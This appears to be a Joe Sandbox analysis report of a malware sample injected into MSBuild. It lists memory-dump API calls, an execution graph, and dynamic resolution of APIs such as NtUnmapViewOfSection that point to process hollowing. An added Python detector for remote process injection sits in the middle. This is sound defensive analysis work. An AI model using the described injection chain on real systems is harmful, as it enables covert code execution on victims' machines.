                                                • Source File: 00000009.00000002.2204789724.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_7800000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 070D27EB
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 38d553c641097d32a8bd6832175fab202122017d70931a5bc7dc66717f2f2822
                                                • Instruction ID: 59f00aa92bf897e704e1ebc4d8afe3b75e7ebd6458a12a5001ee0dcb946d7d67
                                                • Opcode Fuzzy Hash: 38d553c641097d32a8bd6832175fab202122017d70931a5bc7dc66717f2f2822
                                                • Instruction Fuzzy Hash: 9F21E5B590024A9FDB10CF9AC585BDEFBF4BB48320F10846AE558A3250D374A944CF61
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEB96
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 43fb6dc43253d3e8c3dc431371441c1a63e565799850c6ee3756d97b8f3a5f4c
                                                • Instruction ID: 3258467cea93c8df080bd37ba34a38347b9117e96b8e28eceea48fe356deeb61
                                                • Opcode Fuzzy Hash: 43fb6dc43253d3e8c3dc431371441c1a63e565799850c6ee3756d97b8f3a5f4c
                                                • Instruction Fuzzy Hash: 8C1129719003499FDF10DFAAC845BDFBBF5AF88320F148419E515A7250C775A950CFA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2203852929.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70d0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 81a378e0321c0e4200bb490647d0e64791dcb96680e92c2f05623631e927ee7b
                                                • Instruction ID: b49b9a58d0d9143e6f1b03c753629acb0c2f2b35a403b82853c61ab475c31340
                                                • Opcode Fuzzy Hash: 81a378e0321c0e4200bb490647d0e64791dcb96680e92c2f05623631e927ee7b
                                                • Instruction Fuzzy Hash: 5C113AB1D003498FDB20DFAAC8457AEFBF4AF88724F248459D519A7240CB75A940CF95
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0EB91265
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2210894003.000000000EB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EB90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_eb90000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 877b9e5c30ba2e6b3b8a65391935297a5bc2b1c8de1df3bf0d69f0cc0ab9670f
                                                • Instruction ID: 5d65e00fd1e66c992a9abe7c9e73268957d162638e798f64992126e1d3dec940
                                                • Opcode Fuzzy Hash: 877b9e5c30ba2e6b3b8a65391935297a5bc2b1c8de1df3bf0d69f0cc0ab9670f
                                                • Instruction Fuzzy Hash: 1011F2B58003499FDB20DF99D585BEEBFF4EB48324F20845AD558A3210C375A945CFA1
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015BAFBE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6693c9e67edd957349efb47e061fd37f295e0901678a536a40225902d2dabdad
                                                • Instruction ID: 1afb2fd879a98c93402033243f9b40910268fea09600f873c75e170537bbb088
                                                • Opcode Fuzzy Hash: 6693c9e67edd957349efb47e061fd37f295e0901678a536a40225902d2dabdad
                                                • Instruction Fuzzy Hash: FB1110B6C003498FDB10CF9AC444BDEFBF4BF88224F10841AD529A7650D379A545CFA1
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015BAFBE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199756369.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_15b0000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9c64aecca3ba61c625261a77858cacb6575465519133c76bde62318e75a30e93
                                                • Instruction ID: d17f4d034135f2eaeccb8525226f3488a93c77cc1d82938996372d6519dc27b3
                                                • Opcode Fuzzy Hash: 9c64aecca3ba61c625261a77858cacb6575465519133c76bde62318e75a30e93
                                                • Instruction Fuzzy Hash: B11113B5C002498FDB20CF9AD484BDEFBF4BF88324F10845AD469A7650C379A545CFA0
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0EB91265
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2210894003.000000000EB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0EB90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_eb90000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 493837af03cc46c0836387090a5c008ff52c65af38e6cea823a1c2628cf0305c
                                                • Instruction ID: 14383460c16cc91f0915ea4804677e933b58448dccc5614a6cde304e2023ea2e
                                                • Opcode Fuzzy Hash: 493837af03cc46c0836387090a5c008ff52c65af38e6cea823a1c2628cf0305c
                                                • Instruction Fuzzy Hash: 1C11FEB58003499FDB10DF9AC985BDEBBF8EB48324F20845AE518A3210C3B5A944CFA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd1d7ad4c51c1757f90eea392bf3eac1d5519f278fed3721957ae64cf37dbd0c
                                                • Instruction ID: ef2b34cebffbd4ab2f3e28a7121e24e9d6619160a8e396d0906bbf83043b9fab
                                                • Opcode Fuzzy Hash: fd1d7ad4c51c1757f90eea392bf3eac1d5519f278fed3721957ae64cf37dbd0c
                                                • Instruction Fuzzy Hash: AC213372510248EFDB05DF54E9C0B27BF61FF88328F20C169EA090B256C376D416CAA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7fd03b0172673a3f9bcec015ba363d6fcb5785020cc02dccfdbbd487df6a6f7
                                                • Instruction ID: 310b8a1456ee78460ad87bc2eccd4bfc3e8ae973bbc712ff1afb211e0f4d1aaa
                                                • Opcode Fuzzy Hash: e7fd03b0172673a3f9bcec015ba363d6fcb5785020cc02dccfdbbd487df6a6f7
                                                • Instruction Fuzzy Hash: B12145B6110208EFDB05DF44D9C0B67BF65FF88324F20C16CEA0A0B256C376E456CAA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 771c82b6447db7e78866c0fdbfaf2a3ab5fb3f1331d968206e75f62f0b7c7fd5
                                                • Instruction ID: 7433604bfd34bf282eada8ab044cfef73c69dee5f3c8cb913c9e14997361e761
                                                • Opcode Fuzzy Hash: 771c82b6447db7e78866c0fdbfaf2a3ab5fb3f1331d968206e75f62f0b7c7fd5
                                                • Instruction Fuzzy Hash: 02212275614308EFDB15EFA4D9C0B26BB61FB84314F20C56DDA0A4B2D2C77AD40BCA61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cf14b4dc40b590b38000cd0f6b0680534d31d01a7648301d64004179d18cab4
                                                • Instruction ID: 74090e68abad943ee69ca396b3cdc03ad72231f00812f7ae649a7c13528229f8
                                                • Opcode Fuzzy Hash: 6cf14b4dc40b590b38000cd0f6b0680534d31d01a7648301d64004179d18cab4
                                                • Instruction Fuzzy Hash: 4F213775524208EFDB05EF94D5C0F25BB61FB84324F20C56DD9094B2DBC376D80ACA61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: e37da4d5c37e2a78e773ffa43db2b91d0571a596d604637588ca0e68cd8e5660
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: 2411DF76404284CFCB12CF54D5C0B16BF71FB84328F24C6A9D9490B256C33AD45ACBA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199495643.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_127d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction ID: 183a8c248c36ea0e2038e5d55f373fb26ca9b8628aa7d337581744fc8b2c54fe
                                                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                • Instruction Fuzzy Hash: 8111DFB6404285DFCB02CF44D5C0B56BF71FB84324F24C2A9D9090B257C33AE456CBA1
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: fafcbb7d3d7162cec0a08ca21de5f3e15f86871e620c00dbae7d963cd3bc0e45
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: EF11BB75504288DFDB02DF54C5C0B15BBA1FB84324F24C6A9D9494B2ABC33AD41ACB61
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2199533577.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_128d000_DcBNSgyxoJFip.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction ID: c032590b11251f37af7129600c4475be3fc1c3dc8f4d83157da56ec5f510081f
                                                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                • Instruction Fuzzy Hash: 1011BB75504288CFDB12DF54D5C4B15BBA2FB84314F24C6AAD9494B696C33AD40BCBA2
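Three of the functions listed above for process 9 resolve VirtualAllocEx, VirtualProtect and ResumeThread; together they are the skeleton of remote process injection (allocate in another process, make code executable, resume a suspended thread). The Python below is an added example and is not part of the Joe Sandbox report: it scores a per-process API trace for that chain, for any caller/target pair rather than only this sample. The trace format, the process ids, the page-protection strings and the WriteProcessMemory step are constructed assumptions; only the three API names come from the listing above.

```python
"""Score a per-process API trace for the remote-injection chain
VirtualAllocEx -> [WriteProcessMemory] -> ResumeThread.

Added example, not code from the sandbox report. The Event layout and the
TRACE below are constructed stand-ins for whatever a sandbox or EDR emits.
"""
from dataclasses import dataclass


@dataclass
class Event:
    t: float       # seconds since trace start
    pid: int       # calling process
    api: str       # Win32 API name as logged
    target: int    # process the call acts on (== pid for in-process calls;
                   # for ResumeThread, the process that owns the thread)
    prot: str = ""  # page-protection argument, when the API takes one


RWX = "PAGE_EXECUTE_READWRITE"

# Constructed trace: process 9 flips its own unpacked region to RWX, then
# allocates in process 4712, writes to it and resumes its thread.
TRACE = [
    Event(1.0, 9, "VirtualProtect", 9, RWX),
    Event(1.1, 9, "VirtualProtect", 9, RWX),
    Event(2.1, 9, "VirtualAllocEx", 4712, RWX),
    Event(2.2, 9, "WriteProcessMemory", 4712),
    Event(2.5, 9, "ResumeThread", 4712),
    # benign: a process allocating in, and resuming a thread of, itself
    Event(3.0, 3001, "VirtualAllocEx", 3001, "PAGE_READWRITE"),
    Event(3.2, 3001, "ResumeThread", 3001),
    # incomplete: remote allocation never followed by a resume
    Event(4.0, 5000, "VirtualAllocEx", 5100, "PAGE_READWRITE"),
]


def detect_remote_injection(events, window_s=30.0):
    """Return one finding per (caller, target) pair whose remote allocation is
    followed by a ResumeThread on the same target within window_s seconds.
    Score: 70 for the bare chain, +15 if WriteProcessMemory sits between,
    +10 if the remote allocation was RWX, +5 if the caller had already made
    its own memory RWX (self-unpacking loader), capped at 100."""
    pending = {}     # (caller, target) -> state of an open VirtualAllocEx
    self_rwx = set()  # callers that made their own memory RWX
    findings = []
    for e in sorted(events, key=lambda ev: ev.t):
        if e.api == "VirtualProtect" and e.target == e.pid and e.prot == RWX:
            self_rwx.add(e.pid)
            continue
        if e.target == e.pid:
            continue  # the remaining APIs only matter cross-process
        key = (e.pid, e.target)
        if e.api == "VirtualAllocEx":
            pending[key] = {"t": e.t, "steps": ["VirtualAllocEx"],
                            "rwx": e.prot == RWX}
        elif e.api == "WriteProcessMemory" and key in pending:
            if "WriteProcessMemory" not in pending[key]["steps"]:
                pending[key]["steps"].append("WriteProcessMemory")
        elif e.api == "ResumeThread" and key in pending:
            state = pending.pop(key)
            if e.t - state["t"] > window_s:
                continue  # too far apart to treat as one injection
            state["steps"].append("ResumeThread")
            score = 70
            if "WriteProcessMemory" in state["steps"]:
                score += 15
            if state["rwx"]:
                score += 10
            if e.pid in self_rwx:
                score += 5
            findings.append({"caller": e.pid, "target": e.target,
                             "steps": state["steps"], "score": min(score, 100)})
    return findings


if __name__ == "__main__":
    for f in detect_remote_injection(TRACE):
        print(f"pid {f['caller']} -> pid {f['target']}: "
              f"{' -> '.join(f['steps'])} (score {f['score']})")
```

The rule deliberately ignores in-process VirtualAllocEx/ResumeThread pairs (common in benign runtimes) and only uses the RWX VirtualProtect calls to raise the score, since on their own they are too noisy to alert on.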

                                                Execution Graph

                                                Execution Coverage:1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.1%
                                                Total number of Nodes:531
                                                Total number of Limit Nodes:19
execution_graph: text dump of the interactive execution graph. Each node is written as a numeric id, the function address, then the resolved API names or an "N API calls" note; edges are written as src->dst. The full dump is not reproduced here. The Win32 APIs resolved on the traced paths are: WaitForSingleObject, SetEvent, CloseHandle, closesocket, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, RaiseException, RtlAllocateHeap, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetStartupInfoW, GetStdHandle, GetFileType, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, LoadLibraryA, GetProcAddress, FindResourceA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyExW, RegDeleteValueW, CreateProcessA, CreateThread, StrToIntA, DeleteFileW, Sleep (plus CRT internals such as __scrt_fastfail, _strftime and __dosmaperr). The main path runs from the CRT entry (433aaa) into 40d767, which resolves imports via LoadLibraryA/GetProcAddress (41bce3), calls GetModuleFileNameW (40d783), queries registry values through RegOpenKeyExA/RegQueryValueExA/RegCloseKey (4124b7, 40697b, 41265d, 41246e), spawns a process with CreateProcessA (4069ba), starts several worker threads with CreateThread (40dd65, 40de8b, 40dedf, 40df5b, 40dfd7, 40dff8, 40e00d) and, at 40e0c5/40e0db/40e0ed, loops on Sleep and DeleteFileW before deleting a registry value with RegOpenKeyExW/RegDeleteValueW (41297a).
47280->47281 47438 402501 47281->47438 47283 401fea 47283->46914 47304 41afd6 47284->47304 47285 41b046 47286 401eea 11 API calls 47285->47286 47287 41b078 47286->47287 47288 401eea 11 API calls 47287->47288 47290 41b080 47288->47290 47289 41b048 47451 403b60 28 API calls 47289->47451 47293 401eea 11 API calls 47290->47293 47295 40d7c6 47293->47295 47294 41b054 47296 401eef 11 API calls 47294->47296 47305 40e8bd 11 API calls 47295->47305 47298 41b05d 47296->47298 47297 401eef 11 API calls 47297->47304 47299 401eea 11 API calls 47298->47299 47301 41b065 47299->47301 47300 401eea 11 API calls 47300->47304 47303 41bfa9 28 API calls 47301->47303 47303->47285 47304->47285 47304->47289 47304->47297 47304->47300 47443 403b60 28 API calls 47304->47443 47444 41bfa9 47304->47444 47305->46919 47306->46921 47307->46926 47308->46930 47309->46933 47310->46936 47312 401efe 47311->47312 47314 401f0a 47312->47314 47479 4021b9 11 API calls 47312->47479 47314->46940 47317 4021b9 47315->47317 47316 4021e8 47316->46942 47317->47316 47480 40262e 11 API calls _Deallocate 47317->47480 47319->46948 47320->46950 47321->46952 47322->46955 47323->46962 47481 401e8f 47324->47481 47326 40bee1 CreateMutexA GetLastError 47326->46966 47327->46927 47328->46931 47329->46937 47331->46958 47332->46954 47333->46973 47334->46961 47335->46972 47336->46980 47337->46990 47338->46983 47339->46996 47340->46974 47341->46979 47342->46988 47343->46994 47344->46997 47345->47000 47346->47003 47347->47005 47348->47007 47349->47009 47350->47012 47351->47018 47352->47024 47353->47029 47354->47036 47355->47038 47356->47044 47357->47017 47358->47023 47359->47027 47360->47033 47361->47042 47362->47045 47363->47050 47364->47056 47365->47060 47366->47065 47367->47069 47368->47030 47369->47034 47370->47043 47371->47049 47372->47052 47373->47055 47374->47062 47375->47064 47376->47068 47377->47072 47378->47074 47379->47076 47380->47078 47381->47080 47382->47082 47383->47084 47384->47086 47385->47088 47386->47091 
47387->47094 47388->47097 47389->47099 47390->47101 47391->47105 47392->47107 47393->47109 47394->47113 47395->47119 47396->47127 47397->47132 47398->47136 47399->47114 47400->47121 47401->47129 47402->47140 47403->47115 47404->47120 47405->47123 47406->47128 47407->47144 47408->47148 47409->47152 47410->47157 47411->47147 47412->47154 47413->47161 47414->47165 47415->47168 47416->47170 47417->47172 47418->47149 47419->47156 47483 419e89 103 API calls 47420->47483 47421->46981 47424 40e183 47423->47424 47425 41a65c LoadResource LockResource SizeofResource 47423->47425 47424->47268 47425->47424 47427 401f8e 47426->47427 47433 402325 47427->47433 47429 401fa4 47429->47272 47431 401f86 28 API calls 47430->47431 47432 406066 47431->47432 47432->47279 47434 40232f 47433->47434 47436 40233a 47434->47436 47437 40294a 28 API calls 47434->47437 47436->47429 47437->47436 47439 40250d 47438->47439 47441 40252b 47439->47441 47442 40261a 28 API calls 47439->47442 47441->47283 47442->47441 47443->47304 47445 41bfae 47444->47445 47446 41bfcb 47445->47446 47448 41bfd2 47445->47448 47471 41bfe3 28 API calls 47446->47471 47452 41c552 47448->47452 47449 41bfd0 47449->47304 47451->47294 47453 41c55c __EH_prolog 47452->47453 47454 41c673 47453->47454 47455 41c595 47453->47455 47478 402649 22 API calls std::_Xinvalid_argument 47454->47478 47472 4026a7 28 API calls 47455->47472 47459 41c5a9 47473 41c536 28 API calls 47459->47473 47461 41c5dc 47462 41c603 47461->47462 47463 41c5f7 47461->47463 47475 41c7cf 11 API calls 47462->47475 47474 41c7b2 11 API calls 47463->47474 47466 41c601 47477 41c75a 11 API calls 47466->47477 47467 41c60f 47476 41c7cf 11 API calls 47467->47476 47470 41c63e 47470->47449 47471->47449 47472->47459 47473->47461 47474->47466 47475->47467 47476->47466 47477->47470 47479->47314 47480->47316 47482 401e94 47481->47482 47491 411637 62 API calls 47489->47491 47493 442447 CallUnexpected 47492->47493 47494 442460 47493->47494 47495 44244e 47493->47495 47516 444acc 
EnterCriticalSection 47494->47516 47528 442595 GetModuleHandleW 47495->47528 47498 442453 47498->47494 47529 4425d9 GetModuleHandleExW 47498->47529 47499 442505 47517 442545 47499->47517 47503 4424dc 47507 4424f4 47503->47507 47538 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47503->47538 47505 442522 47520 442554 47505->47520 47506 44254e 47540 456499 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47506->47540 47539 443475 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47507->47539 47508 442467 47508->47499 47508->47503 47537 4431ef 20 API calls _abort 47508->47537 47516->47508 47541 444b14 LeaveCriticalSection 47517->47541 47519 44251e 47519->47505 47519->47506 47542 447973 47520->47542 47523 442582 47526 4425d9 _abort 8 API calls 47523->47526 47524 442562 GetPEB 47524->47523 47525 442572 GetCurrentProcess TerminateProcess 47524->47525 47525->47523 47527 44258a ExitProcess 47526->47527 47528->47498 47530 442626 47529->47530 47531 442603 GetProcAddress 47529->47531 47533 442635 47530->47533 47534 44262c FreeLibrary 47530->47534 47532 442618 47531->47532 47532->47530 47535 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47533->47535 47534->47533 47536 44245f 47535->47536 47536->47494 47537->47503 47538->47507 47539->47499 47541->47519 47543 447998 47542->47543 47547 44798e 47542->47547 47548 447174 47543->47548 47545 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47546 44255e 47545->47546 47546->47523 47546->47524 47547->47545 47549 4471a0 47548->47549 47550 4471a4 47548->47550 47549->47550 47553 4471c4 47549->47553 47555 447210 47549->47555 47550->47547 47552 4471d0 GetProcAddress 47554 4471e0 __crt_fast_encode_pointer 47552->47554 47553->47550 47553->47552 47554->47550 47556 447226 47555->47556 47557 447231 LoadLibraryExW 47555->47557 47556->47549 47558 447266 47557->47558 47559 44724e GetLastError 47557->47559 47558->47556 47561 44727d 
FreeLibrary 47558->47561 47559->47558 47560 447259 LoadLibraryExW 47559->47560 47560->47558 47561->47556

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                • API String ID: 384173800-625181639
                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
